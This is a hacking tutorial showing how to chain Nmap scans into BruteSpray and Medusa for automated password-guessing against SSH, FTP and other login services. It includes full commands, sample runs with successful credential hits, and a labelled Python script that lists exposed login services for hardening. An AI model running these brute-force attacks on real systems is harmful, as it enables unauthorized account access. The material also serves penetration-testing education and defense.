
Automating Brute-Force Attacks for Nmap Scans «Null Byte :: WonderHowTo



Using Hydra, Ncrack, and other brute-forcing tools to crack passwords for the first time can be frustrating and confusing. To simplify the process, let's look at automating and optimizing brute-force attacks against potentially vulnerable services such as SMTP, SSH, IMAP, and FTP that have been discovered by Nmap, the popular network scanning utility.

BruteSpray, developed by Jacob Robles and Shane Young, is a Python script that parses Nmap scan output and automates brute-force attacks against the services it finds using Medusa, a popular brute-forcing tool. BruteSpray is the much-needed nexus that ties Nmap scans and brute-force attacks together.

Step 1: Set Up BruteSpray & Medusa

An older version of BruteSpray is in the Kali repositories. To avoid possible confusion, any previously installed version of BruteSpray should be removed with the following apt-get command.

  apt-get autoremove brutespray

Reading package lists... Done
Building dependency tree
Reading state information... Done
Package 'brutespray' is not installed, so not removed
0 upgraded, 0 newly installed, 0 to remove and 166 not upgraded.

Then clone the BruteSpray repository.

  git clone https://github.com/x90skysn3k/brutespray.git

Cloning into 'brutespray'...
remote: Counting objects: 395, done.
remote: Compressing objects: 100% (13/13), done.
remote: Total 395 (delta 8), reused 19 (delta 7), pack-reused 375
Receiving objects: 100% (395/395), 70.33 KiB | 178.00 KiB/s, done.
Resolving deltas: 100% (155/155), done.

Then cd into the brutespray/ directory and use pip, a tool for installing and managing Python packages, to install the BruteSpray dependencies. This step is required before BruteSpray will run. The -r argument tells pip to install the dependencies listed in the requirements.txt file.

  cd brutespray/
pip install -r requirements.txt

Requirement already satisfied: argcomplete==1.8.1 in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 1))
Requirement already satisfied: pyscreenshot==0.4.2 in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 2))
Requirement already satisfied: pytesseract==0.1.7 in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 3))
Requirement already satisfied: lxml==3.8.0 in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 4))
Requirement already satisfied: requests==2.12.4 in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 5))
Requirement already satisfied: Pillow==4.2.1 in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 6))
Requirement already satisfied: beautifulsoup4==4.6.0 in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 7))
Requirement already satisfied: EasyProcess in /usr/local/lib/python2.7/dist-packages (from pyscreenshot==0.4.2->-r requirements.txt (line 2))
Requirement already satisfied: olefile in /usr/local/lib/python2.7/dist-packages (from Pillow==4.2.1->-r requirements.txt (line 6))

Lastly, install Medusa. This can be done with the following command.

  apt-get install medusa

Reading package lists... Done
Building dependency tree
Reading state information... Done
medusa is already the newest version (2.2-5).
0 upgraded, 0 newly installed, 0 to remove and 166 not upgraded.

The --help argument can be used to verify that BruteSpray is working properly and to display the available options.

  ./brutespray.py --help

Created by: Shane Young/@x90skysn3k && Jacob Robles/@shellfail
usage: brutespray.py [-h] [-f FILE] [-o OUTPUT] [-s SERVICE] [-t THREADS]
                     [-T HOSTS] [-U USERLIST] [-P PASSLIST] [-u USERNAME]
                     [-p PASSWORD] [-c] [-i] [-m]

Usage: python brutespray.py <OPTIONS>

optional arguments:
  -h, --help            show this help message and exit

Menu Options:
  -f FILE, --file FILE  GNMAP or XML file to parse
  -o OUTPUT, --out OUTPUT
                        directory containing successful attempts
  -s SERVICE, --service SERVICE
                        specify service to attack
  -t THREADS, --threads THREADS
                        number of medusa threads
  -T HOSTS, --host HOSTS
                        number of hosts to test concurrently
  -U USERLIST, --userlist USERLIST
                        reference a custom username file
  -P PASSLIST, --passlist PASSLIST
                        reference a custom password file
  -u USERNAME, --username USERNAME
                        specify a single username
  -p PASSWORD, --password PASSWORD
                        specify a single password
  -c, --continuous      keep brute-forcing after a success
  -i, --interactive     interactive mode
  -m, --modules         list available modules

That is all there is to it: download BruteSpray and install its dependencies. No further changes or configuration are required.

Other prerequisites that will help with this tutorial are Nmap (of course), a general understanding of how Nmap works, and a simple wordlist for password guessing. If you do not already have Nmap, it can be downloaded and installed with the following command.

  apt-get install nmap

Read package lists ... Done
Create dependency tree
Status information is read ... Done
nmap is already the latest version (7.70 + dfsg1-0kali2).
0 updated, 0 reinstalled, 0 removed and 164 not updated. 

The wordlist used in this guide can be downloaded with the following command. Of course, you can use any wordlist you like: one built from leaked password databases, another online wordlist, or the output of wordlist-generation tools such as Mentalist, CeWL, and Crunch.

  wget 'https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt'

--2018-04-12 12:25:36--  https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25585 (25K) [text/plain]
Saving to: '1wordlist2rulethem@ll.txt'

1wordlist2rulethem@ 100%[===================>]  24.99K  --.-KB/s    in 0.04s

2018-04-12 12:25:36 (651 KB/s) - '1wordlist2rulethem@ll.txt' saved [25585/25585]

Step 2: Create Nmap output files

BruteSpray needs an Nmap output file to work with. Such files are created with the Nmap arguments -oX or -oG, as shown in the Nmap command below. The -sV flag tells Nmap to probe open ports to determine service and version information.

The -oG argument is the important one here. It saves the Nmap output to a local file in "grepable" format, which lets BruteSpray efficiently work out which services and ports were found on the target server. Similarly, -oX saves the Nmap output as XML, which BruteSpray also supports but which is less readable.

  nmap -sVTU -p ports targetServer -oG filename.gnmap

Here is my example of this command and its output:

  nmap -sVTU -p21,22,137,161 1X.XXX.XXX.103 -oG tokyoneon.gnmap

Starting Nmap 7.70 ( https://nmap.org )
Nmap scan report for 1X.XXX.XXX.103
Host is up (0.00018s latency).

PORT     STATE  SERVICE    VERSION
21/tcp   open   ftp        vsftpd 3.0.3
22/tcp   open   ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
137/tcp  closed netbios-ns
161/tcp  closed snmp
21/udp   closed ftp
22/udp   closed ssh
137/udp  open   netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)
161/udp  open   snmp       SNMPv1 server; net-snmp SNMPv3 server (public)
MAC Address: 6C:DB:XX:XX:XX:XX (XXXXX)
Service Info: Host: XXXXX; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.60 seconds

Be sure to replace "ports" with the ports you want to scan, "targetServer" with the IP address of your target, and "filename" with the name you want to give the file. After the scan finishes, the newly created .gnmap file can be viewed with the cat command.

  cat filename.gnmap 

After running my sample command:

  cat tokyoneon.gnmap

# Nmap 7.70 scan initiated Thu Apr 12 18:34:07 2018 as: nmap -sVTU -p21,22,137,161 -oG tokyoneon.gnmap 1X.XXX.XXX.103
Host: 1X.XXX.XXX.103 ()	Status: Up
Host: 1X.XXX.XXX.103 ()	Ports: 21/open/tcp//ftp//vsftpd 3.0.3/, 22/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)/, 137/closed/tcp//netbios-ns///, 161/closed/tcp//snmp///, 21/closed/udp//ftp///, 22/closed/udp//ssh///, 137/open/udp//netbios-ns//Samba nmbd netbios-ns (workgroup: WORKGROUP)/, 161/open/udp//snmp//SNMPv1 server; net-snmp SNMPv3 server (public)/
# Nmap done at Thu Apr 12 18:35:55 2018 -- 1 IP address (1 host up) scanned in 0.60 seconds

Note the "open" ports discovered by Nmap: these are the services that are now available for automated brute-force attacks.

Step 3: Automating Brute Force Attacks with BruteSpray

BruteSpray currently supports nearly two dozen services out of the box. The supported services can be listed with the --modules argument. They include SSH, FTP, Telnet, VNC, MsSQL, MySQL, PostgreSQL, RSH, IMAP, NNTP, pcAnywhere, POP3, rexec, rlogin, SMBNT, SMTP, SVN, vmauthd, and SNMP.

  ./brutespray.py --modules

Created by: Shane Young/@x90skysn3k && Jacob Robles/@shellfail
Supported Services:

ssh
ftp
telnet
vnc
mssql
mysql
postgresql
rsh
imap
nntp
pcanywhere
pop3
rexec
rlogin
smbnt
smtp
svn
vmauthd
snmp
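The grepable format from Step 2 and the module list above go together: every "Ports:" entry in a .gnmap file is seven slash-separated fields (port/state/protocol/owner/service/rpcinfo/version/), and the services under --modules are exactly the ones that accept a username and password (or, for SNMP, a community string). The following Python script is an added example, not part of the original article and not BruteSpray's own code; it parses a .gnmap file and reports the open ports whose service takes credentials. From a defender's point of view that is an exposure inventory: the list BruteSpray would hand to Medusa is the list of services to firewall off, rate-limit, lock out after failed attempts, or move to key-based authentication. The sample scan text, the 192.0.2.103 placeholder address and the SERVICE_ALIASES mapping are constructed for this example.

```python
import re
import sys

# Constructed sample in Nmap's grepable (-oG) format, modelled on the scan in
# Step 2; the address is an RFC 5737 documentation placeholder, not a real host.
SAMPLE_GNMAP = (
    "# Nmap 7.70 scan initiated Thu Apr 12 18:34:07 2018 as: "
    "nmap -sVTU -p21,22,137,161 -oG tokyoneon.gnmap 192.0.2.103\n"
    "Host: 192.0.2.103 ()\tStatus: Up\n"
    "Host: 192.0.2.103 ()\tPorts: "
    "21/open/tcp//ftp//vsftpd 3.0.3/, "
    "22/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)/, "
    "137/closed/tcp//netbios-ns///, 161/closed/tcp//snmp///, "
    "21/closed/udp//ftp///, 22/closed/udp//ssh///, "
    "137/open/udp//netbios-ns//Samba nmbd netbios-ns (workgroup: WORKGROUP)/, "
    "161/open/udp//snmp//SNMPv1 server; net-snmp SNMPv3 server (public)/\n"
    "# Nmap done at Thu Apr 12 18:35:55 2018 -- 1 IP address (1 host up) "
    "scanned in 0.60 seconds\n"
)

# The services BruteSpray lists under --modules. Each one authenticates with a
# username/password pair (SNMP with a community string), so an open instance is
# a password-guessing target and therefore a hardening item.
PASSWORD_AUTH_SERVICES = {
    "ssh", "ftp", "telnet", "vnc", "mssql", "mysql", "postgresql", "rsh", "imap",
    "nntp", "pcanywhere", "pop3", "rexec", "rlogin", "smbnt", "smtp", "svn",
    "vmauthd", "snmp",
}

# Nmap's service names do not always match BruteSpray's module names; this
# mapping is an assumption made for the example, extend it as needed.
SERVICE_ALIASES = {
    "microsoft-ds": "smbnt",
    "netbios-ssn": "smbnt",
    "postgres": "postgresql",
    "ms-sql-s": "mssql",
}

# One port entry: port/state/proto/owner/service/rpcinfo/version/
# State may contain '|' (e.g. open|filtered), so it is matched as "not a slash".
PORT_RE = re.compile(r"(\d+)/([^/]+)/(\w+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")


def parse_gnmap(text):
    """Return one dict per port entry found in grepable Nmap output."""
    results = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue  # comment lines and 'Status:' lines carry no port data
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1]
        # Larger scans append an "Ignored State:" summary after the port list.
        ports_field = ports_field.split("\tIgnored State:")[0]
        for m in PORT_RE.finditer(ports_field):
            port, state, proto, _owner, service, _rpc, version = m.groups()
            results.append({
                "host": host, "port": int(port), "proto": proto,
                "state": state, "service": service, "version": version,
            })
    return results


def exposed_auth_services(text):
    """Open ports whose service takes credentials, as (host, port, proto, service, version).

    This is the subset BruteSpray would attack; for a defender it is the list
    of services that need lockouts, rate limiting, key-only auth, or a firewall rule.
    """
    exposed = []
    for p in parse_gnmap(text):
        service = SERVICE_ALIASES.get(p["service"], p["service"])
        if p["state"] == "open" and service in PASSWORD_AUTH_SERVICES:
            exposed.append((p["host"], p["port"], p["proto"], service, p["version"]))
    return exposed


if __name__ == "__main__":
    # Usage: python gnmap_exposure.py [scan.gnmap]; without a file the sample is used.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_GNMAP
    for host, port, proto, service, version in exposed_auth_services(text):
        print(f"{host}:{port}/{proto:<4} {service:<12} {version}")
```

On the sample the script lists ftp/21, ssh/22 and snmp/161 and skips the open netbios-ns port on udp/137, because name-service traffic carries no credentials to guess; the closed ports are skipped on state alone. Pointing it at a real .gnmap file from your own scan gives the same list that the interactive mode in the next step displays under "Available services for brute-force".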

1. Interactive Mode

The -i argument enables interactive mode, a guided mode designed to make the tool easier to use.

  ./brutespray.py --file filename.gnmap -i

----------------------------------------

./brutespray.py --file tokyoneon.gnmap -i

Created by: Shane Young/@x90skysn3k && Jacob Robles/@shellfail

Welcome to interactive mode!

WARNING: Leaving an option blank will use its default setting

Available services to brute-force:
Service: ftp on port 21 with 1 hosts
Service: snmp on port 161 with 1 hosts
Service: ssh on port 22 with 1 hosts

Enter services you want to brute-force - default all (ssh, ftp, etc.):

Just follow the instructions and the brute force attack begins.

  Enter services you want to brute-force - default all (ssh, ftp, etc.): ftp
Enter the number of parallel threads (default is 2): 1
Enter the number of parallel hosts to check per service (default is 1): 1
Would you like to specify a wordlist? (y/n): n
Would you like to specify a single username or password (y/n): y
Enter a username: user
Enter a password:

Be sure to use the right number of threads (-t) and parallel hosts (-T) before brute-forcing.
Output is written to: ./brutespray-output/

Brute-forcing...
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: 123456 (1 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: 123456789 (2 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: password (3 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: success (4 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: asdfghjkl (5 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: 11111111 (6 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: iloveyou (7 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: letmein (8 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: wonderhow2 (9 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 User: user Password: wonderhow2 [SUCCESS]

2. Target Individual Services

A single service can be targeted with the --service argument followed by the protocol name. If --username is omitted, BruteSpray falls back to the default username list for that service, which for SSH is the wordlist/ssh/user file. This username list can be changed at any time.

  ./brutespray.py --file filename.gnmap --service ssh

----------------------------------------

./brutespray.py --file tokyoneon.gnmap --service ssh

Created by: Shane Young/@x90skysn3k && Jacob Robles/@shellfail

Be sure to use the right number of threads (-t) and parallel hosts (-T) before brute-forcing.
Output is written to: ./brutespray-output/

Brute-forcing...
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: 123456 (1 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: 123456789 (2 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: password (3 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: success (4 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: asdfghjkl (5 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: 11111111 (6 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: iloveyou (7 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: letmein (8 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: root (1 of 3, 1 complete) Password: wonderhow2 (9 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: 123456 (1 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: 123456789 (2 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (2 of 3, 1 complete) Password: 123456 (1 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: password (3 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (2 of 3, 1 complete) Password: 123456789 (2 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (2 of 3, 1 complete) Password: password (3 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: success (4 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: asdfghjkl (5 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (2 of 3, 1 complete) Password: success (4 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: admin (3 of 3, 1 complete) Password: 11111111 (6 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (3 of 3, 1 complete) Password: asdfghjkl (5 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (3 of 3, 1 complete) Password: 11111111 (6 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: admin (3 of 3, 1 complete) Password: iloveyou (7 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: admin (3 of 3, 1 complete) Password: letmein (8 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (3 of 3, 1 complete) Password: iloveyou (7 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: admin (3 of 3, 1 complete) Password: wonderhow2 (9 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (3 of 3, 2 complete) Password: letmein (8 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (3 of 3, 2 complete) Password: wonderhow2 (9 of 9 complete)

ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 User: user Password: wonderhow2 [SUCCESS]

3. Configuring custom word lists and user names (optional)

BruteSpray ships with small built-in wordlists and username lists that are used automatically when a given service is brute-forced. For example, the password file in the wordlist/ssh/ directory holds the passwords tried against SSH services. Every supported service has its own directory under wordlist/.

  ls -F wordlist/

ftp/   mssql/  nntp/        postgres/  rlogin/  smbnt/  ssh/  telnet/   vnc/
imap/  mysql/  pcanywhere/  rexec/     rsh/     smtp/   svn/  vmauthd/

The built-in wordlists can be replaced manually by using the cp command below to copy a custom wordlist over them.

  cp /path/to/customPasswords.list wordlist/ssh/password

The built-in user name lists can also be changed with the following command.

  cp /path/to/customUser.list wordlist/vnc/user

Alternatively, custom password and username lists can be supplied on the command line with the --passlist and --username arguments.

  ./brutespray.py --file filename.gnmap --username UsernameHere --passlist /path/to/desired/passwords.list --service ftp

----------------------------------------

./brutespray.py --file tokyoneon.gnmap --passlist /root/to/Desktop/passwords.list --service ftp

Created by: Shane Young/@x90skysn3k && Jacob Robles/@shellfail
Be sure to use the right number of threads (-t) and parallel hosts (-T) before brute-forcing.
Output is written to: ./brutespray-output/

Brute-forcing...
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: 123456 (1 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: 123456789 (2 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: password (3 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: success (4 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: asdfghjkl (5 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: 11111111 (6 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: iloveyou (7 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: letmein (8 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: wonderhow2 (9 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 User: user Password: wonderhow2 [SUCCESS]

These are just a few examples. If you need more help, you can find me in the comments below or on Twitter at @tokyoneon_.

Cover image by Jefferson Santos/Pexels; screenshots by tokyoneon/Null Byte



